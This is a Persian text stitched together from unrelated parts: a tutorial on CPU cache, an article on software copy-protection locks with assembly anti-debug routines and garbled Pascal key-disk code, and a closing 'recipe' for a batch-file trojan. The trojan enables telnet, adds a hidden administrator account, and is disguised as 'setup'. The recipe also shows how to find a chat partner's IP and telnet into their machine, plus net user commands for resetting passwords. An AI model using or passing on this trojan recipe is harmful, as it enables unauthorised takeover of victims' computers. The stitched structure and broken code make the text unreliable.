اگر تا کنون برای خود کامپيوتری تهيه  کرده باشيد ، واژه " Cache"  برای شما آشنا خواهد بود. کامپيوترهای جديد دارای Cache از نوع L1 و L2 می باشند. شايد در هنگام خريد يک کامپيوتر از طرف دوستانتان توصيه هائی به شما شده باشد مثلا" : " سعی کن از تراشه های Celeron استفاده نکنی چون دارای Cache نمی باشند! "

Cache يک مفهوم کامپيوتری است که  بر روی هر نوع کامپيوتر با يک شکل خاص وجود دارد. حافظه های Cache ، نرم افزارهای با قابليت Cache هارد ديسک و صفحات Cache همه بنوعی از مفهوم Caching استفاده می نمايند. حافظه مجازی که توسط سيستم های عامل ارائه می گردد نيز از مفهوم فوق استفاده می نمايد.

مبانی Caching

Caching يک نکنولوژی استفاده شده برای  زير سيستم های حافظه ، در کامپيوتر است . مهمترين هدف يک Cache افزايش سرعت و عملکرد کامپيوتر بدون تحميل هزينه های اضافی برای تهيه سيستم است . با استفاده از Cache عمليات  کاربران با سرعت بيشتری انجام خواهد شد.

کتابداری را در نظر بگيريد که در يک کتابخانه مسئول تحويل کتاب به متقاضيان است . فرض کنيد در سيستم فوق ( درخواست و تحويل کتاب ) از مفهوم Cache استفاده نمی گردد. اولين متقاصی کتابی را درخواست می نمايد( فرض شده است که متقاضی خود نمی تواند مستقيما" کتاب مورد نظر  را از قفسه مربوطه ،بردارد)  ، کتابدار، کتاب مورد نظر را از قفسه مربوطه پيدا  و در ادامه آن را تحويل متقاضی می نمايد. متقاضی پس از ساعاتی مراجعه و کتاب را تحويل می دهد. کتابدار، کتاب  تحويلی را مجددا" در  قفسه مربوطه قرار می دهد. پس از لحظاتی يک متقاضی ديگر مراجعه و همان کتاب قبلی را درخواست می نمايد ، کتابدار مجددا" می بايست به بخش مربوطه در کتابخانه مراجعه و پس از بازيابی کتاب ، آن را در اختيار متقاضی دوم قرار دهد.همانگونه که ملاحظه می گردد ، کتابدار مکلف است برای تحويل هر کتاب ( ولو کتاب هائی که فرکانس استفاده از آنان توسط متقاضيان زياد باشد ) به بخش مربوطه مراجعه و پس از يافتن کتاب آن را در اختيار متقاضيان قرار دهد.  آيا روشی وجود دارد که با استناد به آن بتوان عملکرد و کارآئی کتابدار را بهبود بخشيد ؟

در پاسخ به سوال فوق می توان با ايجاد يک سيستم Cache برای کتابدار ، کارآئی آن را افزايش داد. فرض کنيد بخشی را با ظرفيت حداکثر ده کتاب در مجاورت ( نزديکی ) کتابدار آماده نمائيم . کتاب هائی که توسط متقاضيان برگردانده می شود، در بخش  فوق ذخيره خواهند شد. مثال فوق را با در نظر گرفتن سيستم Cache ايجاد شده برای کتابدار مجددا" دنبال می نمائيم . در ابتدای فعاليت روزانه  ، بخش Cache خالی بوده و هنوز در آن کتابی قرار نگرفته است . اولين متفقاصی مراجعه و کتابی را درخواست می نمايد . کتابدار می بايست به بخش مربوطه مراجعه و کتاب را از قفسه مربوطه براشته و در اختيار متقاضی قرار دهد. متقاضی پس از تحويل کتاب ، چند ساعت بعد مراجعه و کتاب را تجويل کتابدار خواهد داد. کتابدار، کتاب تحويلی را در بخش پيش بينی شده برای Cache قرار می دهد. لحظاتی بعد متقاضی ديگر مراجعه و درخواست همان کتاب را می نمايد .کتابدار در ابتدا بخش مربوط به Cache را جستجو و در صورت يافتن کتاب ، آن را به متقاضی تحويل خواهد داد. در اين حالت ضرورتی به مراجعه کتابدار به بخش و قفسه های مربوطه  نخواهد بود. در روش فوق زمان تحويل کتاب به متقاضی بهبود چشمگيری پيدا خواهد کرد. در صورتيکه کتاب درخواستی توسط متقاضی در بخش Cache کتابخانه نباشد ، چه اتفاقی خواهد افتاد؟ در ابتدا مدت زمانی صرف خواهد شد که کتابدار به اين اطمينان برسد که کتاب درخواستی در بخش Cache موجود نمی باشد ( جستجو)  يکی از چالش های اصلی در رابطه با طراحی Cache به حداقل رساندن زمان جستجو  در Cache است .سخت افزارهای جديد ، زمان فوق را به صفر نزديک کرده اند.  پس از حصول اطمينان از عدم وجود کتاب در بخش Cache ، کتابدار می بايست با مراجعه به بخش مربوطه آن را انتخاب و در ادامه در اختيار متقاضی قرار دهد.

با توجه به مثال فوق ، چندين نکته مهم در رابطه با Cache استنباط می گردد:

- تکنولوژی Cache ، استفاده از حافظه های سريع  ولی کوچک ، بمنظور افزايش سرعت يک حافظه کند ولی با حجم بالا است

- زمانيکه از Cache استفاده می گردد ، در ابتدا می بايست محتويات آن بمنظور يافتن اطلاعات مورد نظر بررسی گردد. فرآيند فوق را Cache hit می گويند. در صورتيکه اطلاعات مورد نظر در Cache موجود نباشند (Cache miss) ، کامپيوتر می بايست در انتظار تامين داده های خود از حافظه اصلی سيستم باشد ( حافظه ای کند ولی با حجم بالا )

- اندازه Cache محدود  بوده وسعی می گردد که ظرفيت فوق حتی المقدور زياد باشد ، ولی بهرحال اندازه آن نسبت به رسانه های ذخيره سازی ديگر بسيار کم است .

- اين امکان وجود خواهد داشت که از چندين لايه Cache استفاده گردد.

Cache در کامپيوتر

کامپيوتر، ماشينی است که زمان انجام کارها توسط آن با واحدهای خيلی کوچک اندازه گيری می گردد.زمانيکه ريزپردازنده قصد دستيابی به  حافظه اصلی را داشته باشد، می بايست مدت زمانی معادل 60 نانوثانيه را برای اين کار در نظر بگيرد. سرعت فوق بسيار بالا است ولی سرعت ريزپردازنده بمراتب بيشتر است . ريزپردازنده قادر به داشتن سيکل هائی به اندازه دو نانوثانيه است . تفاوت سرعت بين پردازنده و حافظه کاملا" مشهود بوده و قطعا" رضايت پردازنده در اين خصوص کسب نخواهد شد. پردازنده می بايست تاوان کند بودن حافظه را خود بپردازد . انتظار پردازنده و هرز رفتن زمان مفيد وی کوچکترين تاوانی است که می بايست پردازنده پذيرای آن باشد.

بمنظور حل مشکل فوق ، فرض کنيد از  يک نوع حاص حافظه،  با ظرفيت کم ولی با سرعت بالا ( 30 نانوثانيه ) ، استفاده گردد . سرعت دستيابی به حافظه فوق دو مرتبه سريعتر نسبت به حافظه اصلی است .اين نوع حافظه راL2 Cache   می نامند. فرض کنيد از يک حافظه بمراتب سريعتر ولی با حجم کمتر استفاده و آن را مستقيما" با پردازنده اصلی درگير نمود. سرعت دستيابی به حافظه فوق می بايست در حد و اندازه سرعت پردازنده باشد .اين نوع حافظه ها را L1 Cache می گويند.

در کامپيوتر از زيرسيستمهای متفاوتی استفاده می گردد.از Cache می توان در رابطه با اکثر زير سيستمهای فوق استفاده تا کارآئی  آنان افزايش يابد.

تکنولوژی Cache

يکی از سوالاتی که ممکن است در ذهن خواننده اين بخش خطور پيدا کند اين است که " چرا تمام حافظه کامپيوترها از نوع L1 Cache نمی باشند تا ديگر ضرورتی به استفاده از Cache وجود نداشته باشد؟" در پاسخ می بايست گفت که اشکالی ندارد وهمه چيز هم بخوبی کار خواهد کرد ولی قيمت کامپيوتر بطرز قابل ملاحظه ای افزايش خواهد يافت . ايده Cache ، استفاده از يک مقدار کم حافظه ولی با سرعت بالا( قيمت بالا) برای افزايش سرعت و کارآئی ميزان زيادی حافظه  ولی با سرعت پايين ( قيمت ارزان ) است .

در طراحی يک کامپيوتر هدف فراهم کردن شرايط لازم برای فعاليت پردازنده با حداکثر توان و در سريعترين زمان است . يک تراشه 500 مگاهرتزی ، در يک ثانيه پانصد ميليون مرتبه سيکل خود را خواهد داشت ( هر سيکل در دونانوثانيه ) . بدون استفاده از L1 و L2 Cache ، دستيابی به حافظه حدودا" 60 نانوثانيه طول خواهد کشيد. بهرحال استفاده از  Cache اثرات مثبت خود را بدنبال داشته و باعث بهبود کارآئی پردازنده می گردد.اگر مقدار L2 Cache  معادل 256 کيلو بايت و ظرفيت حافظه اصلی معادل 64 مگابايت باشد ،  256000 بايت مربوط به Cache با استفاده از روش های موجود  قادر به Cache نمودن 64000000 بايت حافظه اصلی خواهند بود.

با توجه به فزوني نرم افزار در سيستم هاي كامپيوتري از يك طرف و توانايي كنترل كپي هاي غيرمجاز ( از ديدگاه اقتصادي آن ) از طرفي ديگر دليلي محكم جهت بررسي اين شاخه از مهندسي نرم افزار مي باشد.
از آنجا كه متاسفانه قانون Copyright در تمام جهان بجز ايران و چند كشور ديگر اجرا مي گردد, بحث كنترل كپي هاي غيرمجاز حساس تر مي شود. در اين مقاله سعي بر اين است تا ...

علاوه بر آشنايي با انواع قفل هاي نرم افزاري و اختلاف آن ها با قفل هاي سخت افزاري, بتوانيم به عنوان طراح يك قفل نرم افزاري از محصولات نرم افزاري خودمان حمايت كنيم. ضمنا علاوه بر آشنايي با مفاهيم فوق, نوشتن روتين هاي ضد ديباگ و همچنين نحوه كد كردن اطلاعات نيز لحاظ شده است.
لازم به ذكر است كه اين مقاله حاصل تجربيات چند ساله و زحمات زيادي است كه تقديم مي گردد.
كلمات كليدي
Key Lock, Hard Lock, Software Lock, قفل نرم افزاري، Tag Lock, Anti Debug, قفل سخت افزاري

مقدمه
از آنجا كه زمان زيادي تا سال 2000 باقي نمانده, اما هنوز در كشور ما ايران, نرم افزار جاي خود را به عنوان يك محصول صادراتي پيدا نكرده چرا كه يكي از دلايل اصلي آن عدم توجه جدي به حمايت از توليد كنندگان نرم افزار مي باشد. به هر حال قصد اينجانب از ارائه مقاله, بررسي كم و كاستي هاي نرم افزار در ايران نيست بلكه طريقه حل مشكل موجود در اين بازار نابسامان مي باشد. با توجه به كپي هاي غيرمجازي كه روزانه بصورت كاملا عادي و بدون اطلاع سازنده آن صورت مي گيرد, جلوگيري از اين عمل و كنترل جدي آن امري ضروري و واجب بنظر مي رسد. در ادامه مطلب به توضيح درباره قفل هاي نرم افزاري و سخت افزاري مي پردازيم.
آشنايي با قفل هاي نرم افزاري و سخت افزاري
تعريف قفل هاي نرم افزاري: به هر برنامه اي كه كنترل كپي آن فقط از طريق نرم افزار و بدون نياز به سخت افزار اضافي قابل انجام باشد, گويند.
تعريف قفل هاي سخت افزاري: به هر برنامه اي كه كنترل كپي آن از طريق سخت افزار اضافي قابل انجام باشد, گويند.
با توجه به تعاريف فوق مي توان به تفاوت قفل هاي سخت افزاري و نرم افزاري پي برد. قفل هاي سخت افزاري با توجه به اضافه كردن يك سخت افزار جديد به كامپيوتر ( اغلب از طريق ارتباط با پورت چاپگر ) برنامه خود را كنترل مي كنند. برنامه قبل از اجرا ابتدا با توجه به مراجعه به آدرس سخت افزار نصب شده ( اضافه شده با استفاده از دستور Port ) به سخت افزار مورد نظر خود مراجعه كرده و در صورت يافتن آن, تست هاي مختلف اعم از تست رمز, خواندن اطلاعات و ... مي تواند تصميم گيري نمايد. اما در قفل هاي نرم افزاري برنامه بدون نياز به سخت افزار اضافي و با كنترل رسانه ذخيره سازي مي تواند تصميم گيري كند. ضمنا لازم به توضيح است كه هدف از طراحي قفل هاي نرم افزاري/ سخت افزاري اين نيست كه هيچكس توانايي شكستن ( باز كردن ) آنرا ندارد بلكه مقصود بالا بردن سطح كنترل كپي هاي غير مجاز تا حد ممكن مي باشد. ( چرا كه مي دانيم اطلاعات همه در يك سطح نيست. )
طريقه استفاده از قفل نرم افزاري در برنامه مورد نظر
با توجه به نوع كاربرد برنامه ( كوچك وقابل كپي بر روي يك ديسكت, تحت شبكه و ... ) مي توانيم از انواع روش هايي كه جهت حفاظت از نرم افزار در نظر داريم ( و متعاقبا توضيح داده خواهد شد ) استفاده كنيم. اما مساله قابل بحث اين است كه چگونه از يك قفل منتخب استفاده نمائيم؟
جواب اين سوال متغيير و وابسته به شرايط زير مي باشد:
الف: اعتقاد طراح نرم افزار به اينكه كاربر حتما بايد آنرا خريداري نمايد تا از امكانات آن مطلع گردد.
در اين حالت قفل نرم افزاري در ابتداي شروع به كار برنامه كنترل مي گردد حتي طراح مي تواند در مواقع حساس نيز قفل را مجددا كنترل كند و يا در حالتي كه طراح واقعا سخت گير باشد, مي تواند در زمان هاي مشخصي از وجود قفل اطمينان حاصل نمايد ( مثلا هر 4 ثانيه ). البته در اين حالت طراح بايد روشي را كه جهت كنترل قفل استفاده مي كند, نيز در نظر بگيرد.
ب: اعتقاد طراح نرم افزار به اين كه كاربر مي تواند از نرم افزار به عنوان نسخه نمايشي نيز استفاده كند.
طراح در اين حالت مي بايست در مكان هاي خاصي از برنامه, قفل را كنترل كند. مثلا در يك برنامه حسابداري مي توان تمام بخش هاي سيستم را آزاد گذاشته ( يعني برنامه نيازي به قفل نداشته باشد ) اما در صورتي كه كاربر مايل به استفاده از امكانات گزارشگيري سيستم باشد, قفل نرم افزاري در خواست گردد. مزيت اين روش بر روش قبلي اين است كه ديگر نياز به طراحي نسخه نمايشي جهت مشاهده كاربران وجود ندارد.
آشنايي با نحوه قفل گذاري بر روي يك برنامه
الف: طراح به سورس برنامه دسترسي دارد.
در اين حالت طراح پس از انتخاب روش قفل گذاري, كافيست آنرا به زبان مورد نظر خود پياده سازي نموده و در برنامه خود بگنجاند. ( كه مكان هاي قرار دادن قفل در عنوان قبلي توضيح داده شد. )
ب: طراح ( مجري پروژه ) به سورس برنامه دسترسي ندارد.
گاهي اوقات به يكسري برنامه هاي ارزشمندي برخورد مي كنيم كه فاقد قفل هستند, بنابراين نياز به قفل گذاري وجود دارد. ( البته اين حالت بيشتر در كشور ما و چند كشور ديگر كه در آن ها قانون Copyright معني ندارد, كاربرد دارد. ) جهت تزريق قفل به اين گونه برنامه ها, نياز به آشنايي كامل به ساختار فايل هاي اجرايي (EXE, COM, SYS, ...) وجود دارد چرا كه بايد برنامه اي طراحي كنيم تا همانند يك ويروس كامپيوتري به فايل اجرايي مشخصي بچسبد. البته جهت اينكار بهترين زبان برنامه نويسي, اسمبلي مي باشد. ( بدليل توانايي دخالت در روند اجراي برنامه )
البته در رابطه با نحوه نوشتن اين گونه برنامه ها, روش هاي زيادي وجود دارد كه خود بحثي مجزا را مي طلبد و از حوصله اين مقاله خارج است.
ضمنا براي بالا بردن سطح امنيت برنامه لازم است تا يكسري كد هاي ضد ديباگ در برنامه گنجانده شوند. كدهاي ضد ديباگ, دستوراتي به زبان اسمبلي هستند كه در حالت اجراي عادي برنامه, هيچ تغييري در روند اجراي نمي گذارند بلكه در صورتي كه برنامه توسط ديباگرها اجرا گردد ( مورد ارزيابي قرار گيرد ) بتواند از اجراي آن جلوگيري نمايد. با اضافه كردن كد هاي ضد ديباگ به ابتداي برنامه ( يا قبل از كنترل قفل ) مي توان احتمال دستكاري در برنامه را پائين آورد. ( نحوه نوشتن كد هاي ضد ديباگ در پيوست A آورده شده است.)
آشنايي با روش هاي قفل گذاري و نحوه طراحي آن ها
1- قفل گذاري با استفاده از شماره سريال اصلي ديسكت
همانطور كه مي دانيد, سيستم عامل جهت هر ديسكت يك شماره سريال واحد (UNIQUE) اختصاص مي دهد, بطوريكه شماره سريال هر دو ديسكت با هم يكي نيستند. بنابراين همين خود يك راه تشخيص ديسكت كليد ( قفل ) مي باشد.
جهت استفاده از اين قفل مي بايست شماره سريال ديسكت را خوانده و سپس در داخل برنامه آنرا كنترل نمائيم. يك راه ساده جهت خواندن شماره سريال, اجراي دستور VOL بصورت شكل مقابل است:
VOL >>C:DOSLCK.TMP
بعد با باز كردن فايل LCK.TMP, مي توانيم به محتويات آن دسترسي پيدا كنيم. راه ديگر مراجعه به Boot Sector جهت كنترل قفل مي باشد.
ضريب اطمينان اين قفل در مورد ديسكت ها, 5%-2% بوده و در رابطه با هارد ديسك 60%-50% مي باشد. دليل اين اختلاف اين است كه در حالت قفل ديسكتي با كپي Boot Sector, قفل بر روي ديسكت ديگر قرار خواهد گرفت اما در رابطه با هارد ديسك اينكار به سادگي انجام پذير نيست.
2- قفل گذاري با استفاده از مشخصات سيستم
در اين نوع قفل نرم افزاري, برنامه قبل از اجرا ابتدا مشخصات سيستم را خوانده ( كه اينكار از طريق مراجعه به بخش هاي خاصي از حافظه و يا مراجعه به اطلاعات BIOS انجام مي شود. ) سپس آنرا با فايلي كه قبلا توسط نويسنده نرم افزار بر روي كامپيوتر كپي گرديده, مقايسه مي كند و در صورت عدم برابري, اجراي برنامه پايان مي پذيرد.
اين نوع قفل هنوز هم در بسياري از برنامه ها استفاده مي گردد, اما نكته قابل ذكر اين است كه جهت اطمينان بيشتر به قفل لازم است فايل حاوي مشخصات بصورت كد شده نوشته شده باشد تا امكان دستكاري آن توسط قفل شكنان به حد اقل ممكن برسد.
درصد اطمينان اين نوع قفل 75%-65% مي باشد.
3- قفل با استفاده از موقعيت فايل روي هارد ديسك
اين نوع قفل فقط بر روي هارد ديسك قابل استفاده بوده و به اين صورت است كه فايل اجرايي به موقعيت خود بر روي هارد حساس مي باشد چرا كه قبل از اجرا ابتدا موقعيت خود را از روي سكتورهاي ROOT خوانده و سپس شماره كلاستر اشاره گر به خودش را بدست مي آورد, سپس آنرا با شماره كلاستري كه قبلا توسط برنامه نويس بر روي يكي از فايل هاي برنامه ( ممكن است بصورت كد شده باشد ) قرار داده شده, مقايسه كرده و در صورت برابر بودن اجرا مي شود. اين نوع قفل نسبت به قفل قبلي ( شماره 2 ) استفاده كمتري داشته چرا كه در صورتيكه برنامه از روي بخشي از هارد به ناحيه ديگري انتقال يابد, اجرا نخواهد شد و اين از نظر كاربر بسيار ناپسند مي باشد. ( ضمنا امكان Defra, Scandisk, و ... نيز وجود ندارد چرا كه شماره كلاستر اشاره گر به فايل تغيير خواهد كرد. )
ضريب اطمينان اين نوع قفل نيز 80%-70% مي باشد.
4- قفل با استفاده از فرمت غير استاندارد
اين شيوه يكي از رايج ترين قفل هاي نرم افزاري است كه هنوز هم بصورت جدي مورد استفاده قرار مي گيرد. برخي از دلايل اهميت آن عبارتند از:
- امكان استفاده از روش هاي متفاوت در اين روش
- راحتي و سرعت زياد به هنگام استفاده آن
- وجود ضريب اطمينان بالا و انعطاف پذيري زياد آن
- عدم وجود نرم افزار خاصي جهت باز كردن اين نوع از قفل ها
همان طور كه مي دانيم سيستم عامل جهت دسترسي به اطلاعات يك ديسكت از فرمت خاصي ( 18 سكتور در هر تراك ) استفاده مي كند اما اگر يه تراك به صورت غير استاندارد فرمت شود, ( مثلا 19 سكتور در تراك ) سيستم عامل ديگر توانايي استفاده از سكتورهاي غيرمجاز را نخواهد داشت و بنابراين تمام نرم افزارهاي تحت سيستم عامل مزبور نيز از سكتورهاي مخفي استفاده نكرده, در نتيجه امكان كپي برداري از آنها بسيار ضعيف است. مانيز از همين روش جهت طراحي قفل مورد نظر مان استفاده مي كنيم. بصورتيكه تراك آخر ديسك را بصورت يك سكتوري و با شماره 20 فرمت مي كنيم. سپس جهت كنترل ديسكت به سكتور فوق مراجعه كرده و در صورت وجود, كنترل برنامه را پي مي گيريم. البته غير از تغيير شماره سكتور مي توان از اندازه غير مجاز نيز استفاده كرد يعني بجاي اينكه سكتورها را بصورت 512 بايتي فرمت كنيم, از اندازه 1024, 2048 و ... استفاده مي كنيم. ( قفل نرم افزاري Copy Control كه معروفترين در نوع خود مي باشد, از همين روش استفاده مي كند. )
اين قفل فقط جهت فلاپي ديسك قابل استفاده مي باشد و در صد اطمينان در اين روش حدود 95%-85% مي باشد.
5- قفل با استفاده از شماره سريال ساختگي
اين روش قفل گذاري كه قويترين قفل مي باشد, بصورت مخلوطي از روش هاي 1 و 4 مي باشد يعني ابتدا تراك خاصي را بصورت غير استاندرد فرمت كرده و سپس اطلاعات خاصي را درون آن قرار مي دهند ( شماره سريال فرضي ). اين قفل فقط جهت فلاپي ديسك قابل استفاده بوده و ضريب اطمينان آن حدود 98%-90% مي باشد.
پيوست A- روتين هاي ضد ديباگ Anti Debug Procedures
همان طور كه توضيح داده شد, روتين هاي ضد ديباگ جت جلوگيري از اجراي برنامه هاي ديباگر و يا جلوگيري از ( حد اقل مشكل كردن كار ) دستكاري توسط قفل شكنان, استفاده مي شوند. در زير توضيحات چند روش موثر و مفيد, آورده شده است:
الف: غير فعال كردن وقفه ها
جهت جلوگيري از اجراي مرحله به مرحله ( Trace كردن ) برنامه, مي توان وقفه هاي كنترلر 8359 را غير فعال ساخت. آدرس اين كنترلر 21h بوده و IRQ هاي 7-0 را كنترل مي كند IRQ1 همان وقفه مربوط به صفحه كليد مي باشد. پس با غير فعال كردن اين وقفه مي توان صفحه كليد را غير فعال نمود.
طريقه استفاده:

CS:0100 E421 IN AL,21
CS:0102 0C02 OR AL,02
CS:0104 E621 OUT 21,AL

ب: تغيير بردار وقفه ها
يكي از روش هاي ساده و راحت جهت ضد ديباگ كردن برنامه ها, تغيير برداري است, كه ديباگر از آن استفاده مي كند. (03 ) حتما بخاطر بسپاريد كه در پايان برنامه دوباره آدرس بردار وقفه تغيير داده شده را بازيابي كنيد.
طريقه استفاده:

CS:0100 EB04 JMP 0106
CS:0102 0000 ADD [BX+SI],AL
CS:0104 0000 ADD [BX+SI],AL
CS:0106 31C0 XOR AX,AX
CS:0108 8EC0 MOV ES,AX
CS:010A 268B1E0C00 MOV BX,ES:[000C]
CS:010F 891E0201 MOV [0102],BX
CS:0113 268B1E0E00 MOV BX,ES:[000E]
CS:0118 891E0401 MOV [0104],BX
CS:011C 26C7064C000000 MOV Word Ptr ES:[000C],0000
CS:0123 26C7064E000000 MOV Word Ptr ES:[000E],0000

ج:گيج كردن ديباگر
اين راه يكي از قويترين تكنيك هاي ضد ديباگ بوده كه در آن به وسط يك دستور, پرش مي شود و اينكار باعث قفل كردن ( Hang ) ديباگر خواهد شد.
طريقه استفاده:

CS:0100 E421 IN AL,21
CS:0102 B0FF MOV AL,FF
CS:0104 EB02 JMP 0108
CS:0106 C606E62100 MOV Byte Ptr [21E6],00
CS:010B CD20 INT 20

د: كنترل پرچم هاي CPU
اين روش در برابر ديباگرها بسيار مفيد مي باشد و به اين صورت است كه ابتدا پرچم Trace از CPU را خاموش كرده و در بين برنامه آنرا كنترل كنيم. در صورتيكه اين پرچم روشن شده باشد, مشخص است كه ديباگر در پشت صحنه در حال اجراست.
طريقه استفاده:

CS:0100 9C PUSHF
CS:0101 58 POP AX
CS:0102 25FFFE AND AX,FEFF
CS:0105 50 PUSH AX
CS:0106 9D POPF

و در بين برنامه از دستورات ذيل استفاده كنيد:

CS:1523 9C PUSHF
CS:1524 58 POP AX
CS:1525 250001 AND AX,0100
CS:1528 7402 JZ 152C
CS:152A CD20 INT 20

ه: متوقف ساختن ديباگر
اين روش باعث متوقف شدن ديباگر مي شود كه با اجراي دستور ساده INT 03 مي توان اين كار را انجام داد.
طريقه استفاده:

CS:0100 B96402 MOV CX,0264
CS:0103 BE1001 MOV SI,0110
CS:0106 AC LODSB
CS:0107 CC INT 3
CS:0108 98 CBW
CS:0109 01C3 ADD BX,AX
CS:010B E2F9 LOOP 0106

پيوست B- روش هاي كد كردن اطلاعات Data Coding Procedures
الف: افزودن يك عدد به كد هاي يك فايل
در اين روش جهت كد كردن يك فايل, ابتدا آنرا خوانده و سپس يك مقدار خاص, مثلا 20 را به مقدار هر بايت فايل اضافه مي كنيم. اين يكي از ساده ترين روش ها بوده و نسبتا كارايي خوبي نيز دارد. جهت خارج كردن فايل از حالت كد شده ( Decode ) نيز, كافيست مقدار فوق را از تمام بايت هاي فايل كم كنيم.
ب: XOR كردن كل فايل
در اين روش نيز پس از خواندن كل فايل, تمام بايت هاي آنرا با رشته كاراكتري يا عدد ثابت خاصي XOR كرده و سپس مقدار جديد را در فايل حاصل ضبط مي نمائيم. جهت خارج كردن فايل از حالت كد شده, دقيقا عمل فوق را انجام مي دهيم.
پيوست C- ليست برنامه قفل گذار Pascal Source To Learn
در زير ليست دو برنامه نمونه, كه شماره (1) جهت درست كردن ديسكت قفل و شماره (2) جهت تست آن طراحي شده, آورده شده است:
در اين برنامه ها از تراك 81 و سكتور 20 ( در حالت عادي هر ديسكت فقط 18 سكتور دارد ) جهت قفل برنامه استفاده شده و به اين صورت عمل مي كند كه يك رشته را از كاربر دريافت كرده و در مكان فوق قرار مي دهد و سپس جهت تست رشته دريافتي در برنامه دوم آنرا با اطلاعات موجود در ديسكت مقايسه مي كند و با دادن پيغام مناسبي آنرا چاپ مي نمايد.
اين برنامه توسط Turbo Pascal 7.0 كامپايل و اجرا شده اند.
{
برنامه شماره(1)
اين برنامه جهت ساختن ديسكت قفل استفاده مي شود
}

program PROGRAM-1;
Uses Dos;
TYPE
DAT = String[40];
VAR
C : Registers;
FP : String[15];
PU : Array[1..512] of char;
Data: Dat;
I : Byte;
Key : Dat;
{******************************************}
Procedure ZUW;
Begin
Fp:=#81+#0+#20+#2;
c.d1 :=0;
c.dh :=0;
c.ch:=81;
c.c1:=20;
c.a1:=1;
end;
Procedure Write-Key(data:Dat);
Begin
c.ah:=5;
ZUW;
c.es:=Seg(fp[1]);
c.bx:=Ofs(fp[1]);
Intr(19,c);
c.ah:=5;
ZUW;
c.es:=Seg(fp[1]);
c.bx:=Ofs(fp[1]);
Intr(19,c);
For i:=1 to Length(data) do
Pu:=data;
Pu[i+1]:=#0;
c.ah:=3;
ZUW;
c.es:=Seg(Pu);
C.bx:=Ofs(Pu);
Intr(19.c);
end;
{=======================================}
begin
Writeln;
Writeln(' Program Number1 ');
Writeln(' This Program Used For Create The Key ');
Write(' Please Type Key Word : ');
Readln(Key);
Writeln;
Write(' Writing Key ...');
Write-Key(Key);
Writeln(' OK .');
Writeln;
end.

{

برنامه شماره (2)
اين برنامه جهت كنترل ديسكت قفل استفاده مي شود
}

program PROGRAM-2;
Uses Dos;
Type
DAT = String[40];
Var
C : Registers;
FP : String[15];
PU : Array[1 ..512] of char;
Data: Dat;
I : Byte;
Key : Dat;
{********************************************}
Procedure ZUW;
Begin
Fp:=#81+#0+#20+#2;
c.d1:=0;
c.dh:=0;
c.ch:=81;
c.c1:=20;
c.a1:=1;
end;
{********************************************}
Function Read-Key(Key:Dat):Boolean;
Begin
c.ah:=2;
ZUW;
c.es:=Seg(pu);
c.bx:=Ofs(pu);
Intr(19.c);
c.ah:=2;
ZUW;
c.es:=Seg(pu);
c.bx:=Ofs(pu);
Intr(19,c);
I:=1;
data:=";
While pu<>#0 do
begin
Data :=data+pu[];
Inc(I);
end;
If data=Key then
Read-Key:=True
Else
Read-Key:=False;
end;
{***********************************************}

begin
Writeln;
Writeln(' Program Number2 ');
Writeln(' This Program Used For Check The Key ');
Write(' Please Type Key Word : ');
Readln(Key);
Writeln;
If Read-Key(Key)=False then
Writeln(' I am Sorry , Not Found .');
Else
Writeln(' Very Good , That Found .');
Writeln;
end.

موادلازم: یک عدد user name و password  .  یک عددIP کامپیوتر طرف وباز بودن پورت 23 کامپیوتر طرف.
طرز تهیه: برای به دست آوردن user name و password و همچنین باز کردن پورت 23 به یک عدد تروجان نیاز داریم که
هم می توانیم از نرم افزار های موجود استفاده کنیم و هم می توانیم خودمان بسازیم
طرز تهیه تروجان : ما این تروجان را با فایل bat می سازیم که اگر با فایل های bat اشنایی دارید که فبها المراد در غیر این صورت
باید این توضیح را عرض کنم که این فایل ها با پسوندbat ذخیره شده و می توانند دستورات را در محيط cmd اجرا کنند.
خب ! حال می توانید notepad را باز کنید و دستورات زیر را در آن تایپ کنید.

echo off@
net start telnet 23
net user home "hello" /add
net localgroup administrators home /add
(شما از سمت چپ تراز کنيد)
سپس با پسوند bat ذخیره میکنیم.
دستور اول باعث خاموش شده اکو میشود. یعنی دستورات دیده نشده و فقط نتیجه ان دیده می شود.
دستور دوم پورت 23 کامیوتر را باز میکند که باز بودن ابن پورت باعث می شودکه بتوان بعد از وارد شدن هم حذف و هم اضافه کنیم.
دستور سوم کاربری با نام home و با پسورد hello در کامپیوتر طرف می سازد.
و دستور آخر کاربر home را از گروه Administrator معرفی میکند.
حال برای این که این دستورات دیده نشوند می توان از برنامه bat2com استفاده نمود که فایل مذکور را به پسوندcom تبديل می کند.
.حالا برای این که تابلو نشود میتوان نام ان را setup قرار دهیم.حالا این تروجان اماده است.
اگر برنامه bat2com را نداريد می توانید ایمیل بزنید.
مرحله بعد بدست اوردن ای پی طرف است که این کار یک کمی مشکل است اما ...
برای بدست اوردن ان می توان در هنگام چت با طرف تمام پنجره ها را بست مگر پنجره چت با طرف سپس cmd را باز کرده و دستور زیر را وارد کرده و اینتر را بزنید.

netstat -n
در قسمت foriegn ادرس IP یارو است مثلا 127.0.0.1 بدست امده است.
حالا باید فایل را فرستاده و طرف ان را اجرا کند.
الان همه چیز اماده است.
برای وارد شدن به کامپیوتر يارو cmd را باز کرده و دستور زیر را وارد می کنیم.

telnet 127.0.0.1 23
پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
You are about to send your password information to a remote computer in Internet
zone. This might not be safe. Do you want to send anyway(y/n):
no را تايپ کرده و اينتر را میزنیم پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Service
Login:
حالا username (که در مثال بالا home بود)را وارد کرده و اینتر میزنیم
سپس password (که در بالا hello بود) را زده و اینتر میزنیم
حالا پیغام زیر ظاهر میگردد که نشان می دهد ما در کامپیوتر طرف هستیم.

طریقه ایجاد وحذف و تغییر  کابر توسط Cmd:

برای ایجاد یک کاربر جدید میتوان از دستور زیر استفاده کرد.

net user [username] "[password]" /add

به عنوان مثال دستورات زیر باعث ایجاد یک کاربر به نامhome  با پسورد hello می شود.

net user home "hello" /add

همچنین می توان پسورد کاربرهای قبلی را نیز تغییر داد.و به داشتن پسورد قبلی نیازی نیست.این کاربر ها باید و جود داشته باشند.

دستور زیر باعث تغییر پسورد کاربر home به abcd ميشود.

"net user home "abcd

همچنين برای برداشتن پسورد بايد  ""  را به جای پسورد گذاشت.مثال a

برای حذف کاربر نيز بايد از سوييچ del / استفاده نمود.مثال b

"" a) net user home

b) net user home /del

برای تغيير پسورد administrator ميتوان از دستورات بالا استفاده نمود و به جای user name بايد administrator را وارد نمود.

جلوگیری از تغییر کلمه عبور توسط cmd :

